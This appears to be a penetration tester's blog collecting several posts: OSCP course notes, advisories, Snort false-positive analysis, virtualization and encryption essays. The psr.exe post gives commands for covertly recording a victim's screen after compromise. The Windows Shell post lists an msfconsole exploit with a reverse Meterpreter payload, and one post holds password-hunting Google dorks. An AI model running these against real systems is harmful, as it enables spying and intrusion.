M$ Screencap Application For Troubleshooting… And Sleuthy Spying

I was recently made aware by an infosec colleague of mine, DMFH (aka Donny Harris), of an M$ utility called the Problem Steps Recorder, aka psr.exe.  It comes standard on Windows 7 machines.  In a nutshell, it's used to give tech support a step-by-step breakdown of user activity after a user has re-created a problem, complete with screen captures!  NOTE: it does NOT capture keystrokes, so thankfully M$ did not embed a keylogger into Windows 7.  It produces a script of sorts of the user's activity in Windows: info about PIDs, which mouse buttons were clicked, and various hooks and internal system calls.  What got me was the screen captures… I know there are Metasploit modules (screenspy and screenshot) and AutoIt apps, and that every keylogger on earth has a screencap ability.  DMFH made a good point though: psr.exe would not be caught by most AVs, being that it is a signed and trusted system utility.  And if a user sees psr.exe in their taskmgr and googles it, they'll see it's an M$ troubleshooting tool, so they may be less concerned with it.

I realize that if you're on a box and can run psr.exe you've already owned it, or are close to doing so; this is not the next l33t h@x0r attack, just another tool for your arsenal.  One use case: you have shell access to a machine (no meterpreter) and for some reason can't figure out a way to get tools onto the box.  If it's Windows 7 (I didn't find psr.exe on Server 2k8 R2) you can grab screencaps and save them somewhere you can hopefully access later.  Also, to reiterate my point, it's an M$ utility, so you don't have to bring in another app that could trigger AV.

Below are a few pictures showing what the web archive (.mht) file contained.

Here are the commands to run psr.exe from the CLI.  I did try it from a shell gained via Metasploit and it worked like a champ.  The key is to migrate (if you're not already running as the user) into a PID owned by that user so you capture their session.

 psr.exe /start /output C:\Users\username\test.zip /sc 1 /gui 0

You need to issue (or schedule a task to run) the command below to stop psr.exe from running/recording.

psr.exe /stop
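
To tie it together, here is a rough sketch of the whole flow from a Meterpreter session; the PID, task name and time are made up for the example, and the schtasks line is just one hedged way to schedule the stop if you won't have an interactive shell later:

 meterpreter > ps
 meterpreter > migrate 2316
 meterpreter > shell
 C:\> psr.exe /start /output C:\Users\username\test.zip /sc 1 /gui 0
 C:\> schtasks /create /tn "psrstop" /tr "psr.exe /stop" /sc once /st 17:00

Use ps to spot a process owned by the target user (explorer.exe is a common pick), migrate into it, drop to a shell and kick off the recording; the scheduled task stops it later so the .zip gets written out.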

Here’s a blog post I found that details some of the switches of psr.exe.


Passed the Offensive Security OSCP Exam!

It has been an intense journey since I signed up for the PWBv3 course from Offsec.  But, now it is all worth it.  I received notice that I passed and can now claim the title: Offensive Security Certified Professional (OSCP).  I have taken many security courses, and have gotten a few certifications along the way, and I must say none have been as rewarding as this.  I cannot sing the praises of Offsec enough, even though sometimes during the course I wanted to curse their diabolical minds for coming up with some of the machines I had to penetrate.  I will admit that this was my second attempt at the OSCP exam.  I will not say I failed the first attempt (well actually that’s exactly what I did) but rather learned valuable lessons from it.  My first attempt was 23 hours straight (I took an hour nap) and at the end I knew I had come up short even before they emailed me.  But, this did not discourage me, it energized me!  I talked to many folks who had had a similar experience.  I will say that I hold this certification higher than any I have attained yet, bar none.

To those who are taking the course and may come across this post: Do not fret!  Remember what you’ve learned, and if you get knocked down get up and go at it again!  For those of you who are not (or have not) taken the course, check it out!  I guarantee even if you’ve been pen-testing for years this course will be a heckuva time!

Microsoft (and others’) DLL Load Hijacking Bug – Remote Exploit Possible

Microsoft's security advisory that came out Monday is a bit vague on this bug, but the issue is a more serious matter and deserves security pros' attention, especially if your company uses in-house applications.  The MS KB is here.  The issue itself is not new, but the recently published research that details remote attack vectors is.

A more in-depth analysis of this issue (a good read), along with confirmation of public exploit code, can be found here.

Metasploit has a detection module and audit kit for this bug that can be used to discover applications that are vulnerable to unsecured DLL loading (and also exploit them). 

This bug, at the moment, requires users to open a file which has a bogus DLL in the same directory.  There are many vulnerable applications (both MS and 3rd party), but Microsoft is leaving it to those vendors and its own product teams to release application-specific updates.  Also, for an application to be vulnerable it must accept files as input.  I'm working on getting the list of known vulnerable applications.

The remote vector uses SMB, which is hopefully blocked at your perimeter; WebDAV usually is not, though.

Office documents with embedded content are another vector, as well as USB drives.

The KB above and this MS SRD blog entry have an MS-developed tool that will mitigate most of this threat.  It's an optional download and will not be delivered via Microsoft Update.

The SRD blog states that if users disable outbound SMB and kill the WebDAV client service on workstations they're good to go (although the attack vector of a locally hosted share or a USB thumb drive will still persist), so it may be worthwhile looking at the MS fix tool as well.
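
For reference, a rough sketch of those two workstation-side workarounds from an elevated command prompt; treat it as a starting point and test it in your environment first, since many shops prefer to filter outbound SMB at the perimeter instead:

 sc config WebClient start= disabled
 sc stop WebClient
 netsh advfirewall firewall add rule name="Block outbound SMB" dir=out action=block protocol=TCP remoteport=139,445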

The Perfect Storm – A Story of Snort False Positive Verification

I recently had an opportunity to do some research into a large volume of Snort IDS alerts that had begun to fire (to the tune of millions of alerts a day) for an organization.  At first glance these alerts appeared to be false positives, but after a little review they smelled like a lazy application DDoS attempt from some external source.  When the alerts didn't stop, and considering the application in question wasn't even being used, I needed to provide clarity as to why these alerts were firing.  A simple "ignore them, they're false positives" wasn't going to fly here.

The Snort rule summary is as follows (full rule text displayed later):

It's an Oracle 10g application exploit alert, SID 15554

Alert if 

Source: Outside 

Destination: Inside 

Traffic flow: to server 

Port: 6000-6199 

Protocol: HTTP 

Packet contents match the following Perl-compatible regular expression (more explanation to follow): /^(GET|POST|HEAD)\s+[^\x25]*\x25[\x23\x24\x27\x2a\x2b\x2d\x2ehlqjzt1234567890]*[diouxefgacspn]/i

Don't let the regex above spook you.  Even though it is full of hex escapes, breaking it down isn't too hard.  I'll get into its meaning in more detail below:

First, a little background on big companies and their websites.  Oftentimes the volume of traffic to the sites is so large that companies will use clustered web servers with load balancing appliances in front of them.  For security reasons the servers in the cluster won't host the website on the normal ports 80 or 443; instead, the virtual IP (VIP) of the load balancer accepts the 80 and 443 traffic, which is then NAT'd internally and distributed to one of the web servers on a non-standard port.  What I discovered is that the company had decided, seemingly at random, to use a port in the 6000-6199 range for the post-NAT web traffic.  That, in conjunction with the IDS placement, meant the first five conditions of the Snort rule were met.  However, five out of six conditions is not enough for an alert.

The final condition to match was the regular expression.  Here is an attempt to break down what this expression means in a more user-friendly format:

Match GET, POST or HEAD at the start of the request, followed by one or more whitespace characters.  Then match any number of characters that are not a percent sign, followed by a percent sign (\x25).  After the percent sign, match zero or more characters from the set # $ ' * + - . h l q j z t 0-9 (printf-style flags, widths and length modifiers), and finally match one of the conversion characters d, i, o, u, x, e, f, g, a, c, s, p or n.  The trailing /i makes the whole match case-insensitive.

 After some HTTP packet analysis it was determined that the search functionality on the website matched this regular expression, and was causing the alert to fire erroneously.  Here is a sample of an HTTP GET request for a user initiated search: 

 GET http://www.bogusurl.com/enUS/search-results/default.html?search=test&Ep=search:results:results%20page HTTP/1.0 

Other legitimate requests may also have been matching the Snort rule. 

 Verification of the regular expression matching was performed on the following website: http://www.internetofficer.com/seo-tool/regex-tester/ 
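
If you'd rather sanity-check the match locally, one rough way (assuming a PCRE-aware grep, e.g. GNU grep with -P) is to feed it the request line:

 echo 'GET http://www.bogusurl.com/enUS/search-results/default.html?search=test&Ep=search:results:results%20page HTTP/1.0' | grep -Pi '^(GET|POST|HEAD)\s+[^\x25]*\x25[\x23\x24\x27\x2a\x2b\x2d\x2ehlqjzt1234567890]*[diouxefgacspn]'

The request line comes back as a match: the %20 in the query string supplies the \x25, the 2 and 0 fall inside the flag/width character class, and the p that follows is one of the conversion characters.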

   

The end result was something of a perfect storm, wherein the Snort rule's conditions were all being matched by legitimate web traffic.  This explanation satisfied the organization and the rule was flagged as a false positive.

 Here is the complete text of the Snort rule:

oracle.rules:alert tcp $EXTERNAL_NET any -> $HOME_NET [6000:6199] (msg:"ORACLE Oracle Application Server 10g OPMN service format string vulnerability exploit attempt"; flow:to_server,established; content:"HTTP"; nocase;
pcre:"/^(GET|POST|HEAD)\s+[^\x25]*\x25[\x23\x24\x27\x2a\x2b\x2d\x2ehlqjzt1234567890]*[diouxefgacspn]/i"; metadata:policy
balanced-ips drop, policy security-ips drop; reference:bugtraq,34461; reference:cve,2009-0993;
reference:url,www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html; classtype:attempted-admin;
sid:15554; rev:1;)

Shellcode, Assembly and Buffer Overflow

This is a quick commo check and an update on my progress in the PWBv3 course.

I've spent the better part of this week knee deep in shellcode, assembly and debuggers… and let me tell you, my brain needs a break!  Don't let that sentence scare you away from this course; the tutorials and examples are excellent, and even if you've never read the output of a debugger before you can handle it with the help of the videos and lab guide.  I just finished the "extra mile" portions of the buffer overflow module.  I was determined to nail those!  I've also read that the extra mile modules will help you in your quest for the OSCP certification (24 hours to hack some boxes, remember?).  I found this site to be very helpful when trying my hand at an SEH overflow.

Diving into this training has afforded me the opportunity to strengthen the pen-testing muscles I use daily, but also to train new ones.

I’ll be writing up more about stack based buffer overflows and basic fuzzing in the future.

Metasploit Module Released for Latest Windows 0-day

 

The folks over at the Metasploit Framework have released a working exploit module that takes advantage of the much-talked-about vulnerability in the Windows Shell.

This module proves this vulnerability is not limited to being exploited via thumb drives or email attachments. 

Microsoft has no patch available yet; however, they offer some ugly workarounds: disable the display of .lnk and .pif files, block .lnk/.pif files at your network's perimeter, or disable WebDAV…

FYI: Disabling WebDAV wreaks havoc in some SharePoint instances.

The browser exploit module uses WebDAV to host a .lnk file and a malicious DLL.  No click necessary!  After the target browses to a malicious site, assuming WebDAV is enabled, up pops a window containing the two files and your MSF payload is deployed.  McAfee 8.7.0i was mum on the exploit, even though a source at McAfee has stated, "Coverage for known exploits is provided in the current DAT set (6047) as Generic Dropper!dfg".  Perhaps that's why I got no alert: my payload wasn't a trojan.
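
For those who want to kick the tires, the msfconsole workflow looks roughly like the sketch below.  The module path is the one the Framework settled on and may differ slightly depending on your version, and the LHOST value is obviously a placeholder for your own address:

 msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
 msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
 msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.10
 msf exploit(ms10_046_shortcut_icon_dllloader) > exploit

Once running, the module should print the URL it is serving; lure the target there and wait for the session.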

Regardless, this is a very good delivery method, and while the attacks using it in the wild so far are targeted, I wouldn't be surprised if more malcode were spread via this vector.

Offensive Security Penetration Testing With Backtrack (PWB3)

In my never-ending quest for IT security excellence I've decided to enroll in the Offensive Security Penetration Testing With BackTrack version 3 (PWB3) course, offered by Offensive-Security.  The course, formerly known as OSCP 101, has turned out to be quite a different animal than other security courses/certification tracks I have taken in the past.  I opted to take the online version, which fits my learning style (and family life!).  I am one week into the course and already think it's one of the finest security training events I've gotten to be a part of so far.  Before enrolling I did some searching to find reviews and opinions from different course participants, and while I did find several, they were few and far between.  I've decided to write about my experiences to date, and to provide updates periodically up until the point I take the final exam.  Speaking of the exam, did I mention it's a 100% hands-on exercise, wherein exam participants must compromise unknown machines to pass?  I don't think any type of exam cram method will help folks out on this one!  You either know how to perform a pen test, or you fail, simple as that.

I did some reading and found several great write-ups from folks who have taken the course, but I wanted to throw my hat in the ring of reviewers as well.  I would definitely read these other posts to get different points of view on the PWB3 course.  You can find one here.

Once enrolled you get VPN access to the Offsec lab environment, Flash video files for the course and a PDF lab guide, as well as a dedicated XP VM in the lab network.

One of the neatest things I've come to discover while taking this course is that the initial modules, which at first glance I was tempted to skip, provided real value to me!  I've been using BackTrack for several years, and while my Linux skills may not make me an Uber Linux Ninja, I am fairly capable with the Linux command line and bash scripting.  I forced myself early on not to skip any modules and to watch all of the videos AND read the corresponding sections in the lab guide.  I was pleasantly surprised when shortcuts to the ways I'd been doing things were shown, or different tricks for manipulating text were demonstrated.  I have thoroughly enjoyed the different lab exercises to this point, and have begun getting into the nitty gritty of buffer overflows and shellcode.

One area that has particularly fascinated me has been the use of search engines (specifically Google) in penetration testing/information gathering.  I've known about Johnny Long's Google Hacking Database for several years now, but to see it used in practical examples was excellent.  Using Google to find actual vulnerable web servers was cool (also dangerous), but the simple data gathering techniques shown were very eye opening.  Seeing, and using, some of the different tricks, like using Google search operators to scour the Inter-webs for juicy bits of data, has really been excellent.  I've known and used some of these techniques in the past, but some of the operators or search methods were new to me; a few generic examples of the kind of queries I mean are below.  In one instance I discovered a PDF document whose footer read "Data contained within this document is confidential and proprietary".  Yikes!  I contacted the company that was hosting the data and it disappeared the next day.
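
To give a flavor of the operators involved (the domain is a placeholder and these are generic illustrations, not queries from the course or against any real target):

 site:example.com filetype:pdf "confidential and proprietary"
 site:example.com intitle:"index of" "parent directory"
 site:example.com filetype:xls intext:password

Swap in a domain you're authorized to assess and you quickly get a sense of what's already exposed.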

It really is amazing the types of things you can find out about people and organizations without doing any "hacking" per se, just by intuitively searching Google.  I highly suggest folks try searching for their own names or organizations and see what comes up; you might be surprised!

This course takes you through a penetration test, from alpha to zeta, and adds value throughout.  I can’t speak more highly of it… well, scratch that.  If I pass the final exam THEN I’ll not be able to speak higher…  I’ll update you on my progress in a week or so.

VMware Releases New vSphere Hardening Guides. DISA STIG Precursor?

VMware announced January 25th that they have publicly released security hardening guides for the vSphere virtualization platform.  The hardening guides are broken down into the following categories: introduction, virtual machines (VMs), host, vNetwork, vCenter, and Console OS.  I've read through them and they are organized well, with brief descriptions of the security topic or setting being discussed, along with recommendations and detailed instructions, or links to guides with more in-depth instructions.

I cannot confirm this via the Defense Information Systems Agency (DISA), however I feel that these guides will play heavily into the development of a new DISA ESX Security Technical Implementation Guide (STIG).  This is welcome news for those who work in the DoD/Military workspace.  Organizations that have implemented or are implementing vSphere/ESX/ESXi 4.0 have been relying on the old STIG, which was written with VI3 and ESX 3.5 in mind, plus best practices, to secure their implementations.  The subject areas these guides are broken into also mirror the current DISA STIG checklist format, which leads me to believe that STIG checklists for vSphere won't be far behind.

Virtualization: Pros, Cons and Security: A Few Things to Consider

My virtualization experience is limited to using VMware's suite of products, ESX 3.0 and 3i to be specific.  I also have up to 10 virtual machines (VMs) running at my home office using VMware Workstation 6.5, everything from honeypot boxes to domain controllers, and of course my "victim" machine(s).  I've been using VMs for about five years now, some personally and some professionally.  Before being introduced to ESX and using VMware in an enterprise/datacenter environment I was intrigued by the idea of having multiple operating systems (OSes) on a single machine without having to set the computer up for dual boot, which is, let's face it: a pain.

I became a "quasi" ESX administrator and was introduced to a whole new ball game.  I say quasi because it wasn't my primary job function, but everyone on the team became a surrogate ESX admin.  We set up a dual ESX environment (two Dell PowerEdge M-Series Blade Systems with 16 blades each) with the data (in the form of the virtual disk files: vmdk's) residing on a storage area network (SAN).  We usually ran 700-800 virtual servers, from Windows to Red Hat, with an additional 200 running on network attached storage (NAS) devices.  With the proper configuration of NIC teaming and ESX's load balancing/failover settings I discovered an immensely fault tolerant environment that was nearly devoid of one of the biggest issues enterprise admins face: hardware problems.  Another treat was the server provisioning process.  It used to take nearly a month from start to finish to get a physical server stood up: ordering the server, provisioning rack space, receiving the server, installing software/hardware, testing/hardening and finally delivery to the internal customer.  With the VM environment the requester simply placed an internal order for the server and we spun it up from a template .iso.  Fifteen minutes later, your server's ready for custom applications and your use.  Finally, our disaster recovery was pretty straightforward: move all of the VMs to a waiting offsite ESX server.  Flip the switch, and you're done.  Not only did we save money on hardware costs but on energy; when you don't have to cool and power a bunch of hardware you don't spend as much every month on the electric bill.

There were a lot of pros to working in the virtual environment, centralized administration and fault tolerance to name a few.  But on the other hand there were some cons as well.  If anything goes wrong with your VM environment you lose your servers (800 servers in our case).  We had several places where things could go wrong: the ESX hosts themselves and the SAN/NAS.  When an ESX broke (human configuration error) we lost a ton of servers.

On the admin side of the house you're focused so much on the technology and getting stuff to work properly that you sometimes forget about that pesky little piece of IT that seems to ruin all of your fun: security.  It's not uncommon for admins to "forget" security.  Heck, the Internet was designed with it as an afterthought (if you don't believe me just look at DNS, or TCP/IP).  I, unfortunately, no longer have the luxury of looking at technology with strictly "admin eyes".  I now must consider the ramifications it has with regard to security, both of the system and the infrastructure.

The first big issue with security is host/guest segregation.  Put simply: stuff that happens on the VM shouldn't affect the server that is running VMware Workstation or ESX.  That was always a big selling point for VMware: memory and process segregation.  However, leave it to the vulnerability researchers to rain on folks' parades.  A bug in VMware, discovered by Kostya Kortchinsky, allows code running in a guest OS to execute on the host.  Check it out.  Scary, to say the least.  So now you need to worry about bugs/flaws in your guests harming your host, and if that host is an ESX that houses 500 VM servers… you do the math.  On a similar note, some of the newer VM packages include the ability to cut/paste between VMs and allow actual host disk access from a guest.  Not smart, in my opinion.  I'd flip those switches to "off".

The next area of concern, which deserves close attention, is virtual networking.  The virtual network layer operates similarly to a physical network, using vNICs and vSwitches and… hmm… v-VLANs.  It is possible to bind specific virtual NICs and virtual switches to physical NICs on a host that lead to separate LANs (a DMZ and an internal network, for example).  If it's configured properly you can have complete network segregation within a single ESX.  However, with a few simple mistakes you can create a bridge between the two networks: simply enable IP forwarding on a guest (a one-liner on most Linux guests, as sketched below) and make one or two configs on the vSwitches, and you've just bridged the networks.
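
As a hedged illustration of how little the guest-side half of that mistake takes, on a typical Linux guest it is a single command (the vSwitch misconfiguration still has to happen on top of it):

 sysctl -w net.ipv4.ip_forward=1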

Which leads me to my next point: separation of duties.  What happens when you have ESX admins who also have root on guests?  You have a problem.  They are the gatekeepers and now have a lot of power.  As a best practice the ESX hosts and guests should be administered by separate departments/teams, and neither should have excessive rights to the other's systems.

All in all I’d say that I am a fan of virtualized environments, IF they’re setup properly.  Some feel that virtual environments have too many places that could be points of failure for multiple servers, but that’s when careful thought, planning and analysis come into play.  If it’s done right, a virtualized data center is a fluid machine.  Literally!  It’s only one machine…

Data-At-Rest Encryption

To encrypt or not to encrypt?  That is the question.  The answer is universally YES!  However, there are two schools of thought when it comes to protecting data at rest (possibly more, but I only care about two).  First of all, let's define what data at rest (DAR) is so you don't have to open a new tab/browser window and hit Google.  I'm sure if this post has come up in a search or has otherwise caught your eye you know what DAR is, but I'll lay it out for you here nonetheless: any data that is not traveling over a network or sitting in volatile memory is DAR.  It's sitting somewhere in storage, hoping to be useful someday.  This could be any data, from old emails to operating system files to cached logon credentials.  Whether or not you feel like you are a target for malicious computer users, you should want to protect your data.  Even more so if you're an organization that deals with proprietary data or government information.

Now, back to the two schools of thought: on one hand you have File Encryption Software (FES), on the other Full Disk Encryption (FDE).  Both technologies have their pros and cons, and both have their vehement supporters and naysayers.  I'd be interested to know what your thoughts are on the matter.  I myself have an opinion, and it is just that: an opinion.  I won't say that it fits every scenario, but for security-centric folks I'd say that FDE provides the most robust security for mobile devices and fixed workstations alike.  That view is not shocking; most experts will agree that FDE's preboot authentication, which negates the extremely lax and easily bypassed security of BIOS and operating system (OS) passwords, is a highly secure method of protection.  Let's not forget that FDE also prevents the hard disk and the OS from being accessed via a live Linux distribution such as BackTrack.  Once a malicious user has physical access to a device, compromising it can take seconds with a live-boot OS; however, if the device is protected by FDE then the OS and the data are unreachable.

Some pundits argue that FDE is cumbersome to the end user and has a low level of acceptance when it is deployed.  Speaking of deployment, others say it is very difficult to roll out FDE software in an enterprise environment.  I can speak to both of those issues.  First, depending on the skill level of the IT staff, it is not difficult to integrate FDE software en masse using directory services or other management platforms.  As for end user acceptance, the grim picture painted by some is of a painstaking logon process followed by a horrendously long boot cycle.  This is in fact false.  Most FDE software integrates with the native OS's logon daemons or services, so the experience is nearly identical to the logon process the user is already familiar with.

File encryption has its place.  FES is most suitable for non-mobile devices, protecting critical data or OS files.  Even then, it takes a lot more configuration and monitoring to ensure that you cover all of your bases.  And sometimes companies leave it in the end user's hands to decide what's encrypted and what's not.  When it comes to security my rule is to NEVER leave it to the end user.  Also, if you give someone an inch, they'll take a mile.  FES leaves the door open for attackers to access the OS and the unencrypted portion of the file system.  Maybe they'll drop a few links in a non-critical area, or perhaps they'll slip a few custom DLLs into a non-encrypted area of the file system, just waiting to be called by a cron job.  If you're going to invest in DAR protection, why would you give malicious users a foothold?

FDE has come a long way and has had its ups and downs, but for the most part I feel it is the most secure solution for a mobile workforce (heck, if it works on laptops why not workstations?). All of the stars need to align properly for a successful FDE implementation: first, you need upper echelon support; second, you need a skilled technical staff to implement it, and third, you need to communicate its benefits to managers and users alike.